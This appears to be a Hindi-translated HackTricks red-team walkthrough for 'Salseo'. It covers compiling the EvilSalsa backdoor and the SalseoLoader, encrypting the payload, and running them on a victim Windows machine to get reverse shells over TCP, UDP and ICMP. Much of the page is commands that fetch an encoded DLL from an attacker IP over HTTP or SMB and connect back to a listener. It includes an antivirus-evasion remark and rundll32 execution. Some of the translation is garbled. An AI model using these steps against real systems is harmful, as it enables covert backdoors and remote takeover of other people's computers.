Salseo

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

बाइनरी को कंपाइल करना

गिटहब से स्रोत कोड डाउनलोड करें और EvilSalsa और SalseoLoader को कंपाइल करें। कोड को कंपाइल करने के लिए आपको Visual Studio इंस्टॉल करना होगा।

इन परियोजनाओं को उस विंडोज बॉक्स के लिए कंपाइल करें जहां आप उन्हें उपयोग करने जा रहे हैं (यदि विंडोज x64 का समर्थन करता है तो उन्हें उस विशेषता के लिए कंपाइल करें)।

आप Visual Studio में "Platform Target" में वाम "Build" टैब में वार्चुअल विशेषता का चयन कर सकते हैं।

(**यदि आप इस विकल्प को नहीं ढूंढ सकते तो "प्रोजेक्ट टैब" में जाएं और फिर "<प्रोजेक्ट नाम> गुणवत्ता" में जाएं)

फिर, दोनों परियोजनाएं बनाएं (बिल्ड -> समाधान बनाएं) (लॉग्स के अंदर एक्जीक्यूटेबल का पथ दिखाई देगा):

बैकडोर को तैयार करें

सबसे पहले, आपको EvilSalsa.dll को एन्कोड करने की आवश्यकता होगी। इसे करने के लिए, आप encrypterassembly.py पायथन स्क्रिप्ट का उपयोग कर सकते हैं या परियोजना EncrypterAssembly को कंपाइल कर सकते हैं:

पायथन

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

विंडोज़

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

ठीक है, अब आपके पास सारे जरूरी चीजें हैं जिनकी मदद से आप सारे सालसेओ चीज को क्रियान्वित कर सकते हैं: एन्कोडेड EvilDalsa.dll और SalseoLoader का बाइनरी।

SalseoLoader.exe बाइनरी को मशीन पर अपलोड करें। इन्हें किसी भी AV द्वारा पहचाना नहीं जाना चाहिए...

बैकडोर को क्रियान्वित करें

TCP रिवर्स शैल प्राप्त करना (HTTP के माध्यम से एन्कोडेड dll डाउनलोड करना)

याद रखें कि रिवर्स शैल सुनने वाले के रूप में एनसी शुरू करने और एक HTTP सर्वर शुरू करने के लिए।

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

एक UDP रिवर्स शैल (SMB के माध्यम से एन्कोडेड dll डाउनलोड करना)

याद रखें कि रिवर्स शैल सुनने वाले रूप में एनसी को शुरू करें, और एक SMB सर्वर को एन्कोडेड evilsalsa की सेवा करने के लिए (impacket-smbserver)।

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

एक ICMP रिवर्स शैल (एंकोडेड डीएल पहले से ही पीड़ित के अंदर)

इस बार आपको रिवर्स शैल प्राप्त करने के लिए क्लाइंट में एक विशेष उपकरण की आवश्यकता है। डाउनलोड करें: https://github.com/inquisb/icmpsh

ICMP जवाब अक्षम करें:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

क्लाइंट को निष्पादित करें:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

पीड़ित के अंदर, हम salseo चीज़ को चलाते हैं:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

कॉंपाइलिंग SalseoLoader को DLL के रूप में मुख्य फ़ंक्शन को निर्यात करना

विज़ुअल स्टूडियो का उपयोग करके SalseoLoader परियोजना खोलें।

मुख्य फ़ंक्शन से पहले जोड़ें: [DllExport]

इस परियोजना के लिए DllExport इंस्टॉल करें

उपकरण --> NuGet पैकेज प्रबंधक --> समाधान के लिए NuGet पैकेज स्थापित करें...

DllExport पैकेज के लिए खोजें (ब्राउज़ टैब का उपयोग करके), और स्थापित करें (और पॉपअप को स्वीकार करें)

आपके परियोजना फ़ोल्डर में फ़ाइलें दिखाई देने लगी हैं: DllExport.bat और DllExport_Configure.bat

Uninstall DllExport

अनइंस्टॉल दबाएं (हाँ, यह अजीब है लेकिन मुझ पर भरोसा करें, यह आवश्यक है)

विज़ुअल स्टूडियो बंद करें और DllExport_configure को चलाएं

बस बंद करें विज़ुअल स्टूडियो

फिर, अपने SalseoLoader फ़ोल्डर पर जाएं और DllExport_Configure.bat को चलाएं

x64 का चयन करें (यदि आप इसे x64 बॉक्स के अंदर उपयोग करने जा रहे हैं, तो यह मेरा मामला था), System.Runtime.InteropServices का चयन करें (DllExport के लिए नेमस्पेस के अंदर) और Apply दबाएं

परियोजना को फिर से विज़ुअल स्टूडियो के साथ खोलें

[DllExport] को अब और त्रुटि के रूप में नहीं चिह्नित किया जाना चाहिए

समाधान को बिल्ड करें

आउटपुट प्रकार = क्लास लाइब्रेरी का चयन करें (परियोजना --> SalseoLoader गुण --> एप्लिकेशन --> आउटपुट प्रकार = क्लास लाइब्रेरी)

x64 प्लेटफ़ॉर्म का चयन करें (परियोजना --> SalseoLoader गुण --> बिल्ड --> प्लेटफ़ॉर्म लक्ष्य = x64)

समाधान को बिल्ड करने के लिए: बिल्ड --> समाधान बिल्ड करें (नए DLL का पथ आउटपुट कंसोल के अंदर दिखाई देगा)

उत्पन्न Dll का परीक्षण करें

Dll को जहां परीक्षण करना चाहते हैं, वहां कॉपी और पेस्ट करें।

चलाएं:

rundll32.exe SalseoLoader.dll,main

यदि कोई त्रुटि प्रकट नहीं होती है, तो संभावतः आपके पास एक कार्यात्मक DLL है!!

DLL का उपयोग करके शैल प्राप्त करें

HTTP सर्वर का उपयोग करना न भूलें और nc सुनने वाला सेट करें

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

CMD

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

दूसरे तरीके HackTricks का समर्थन करने के लिए:

Last updated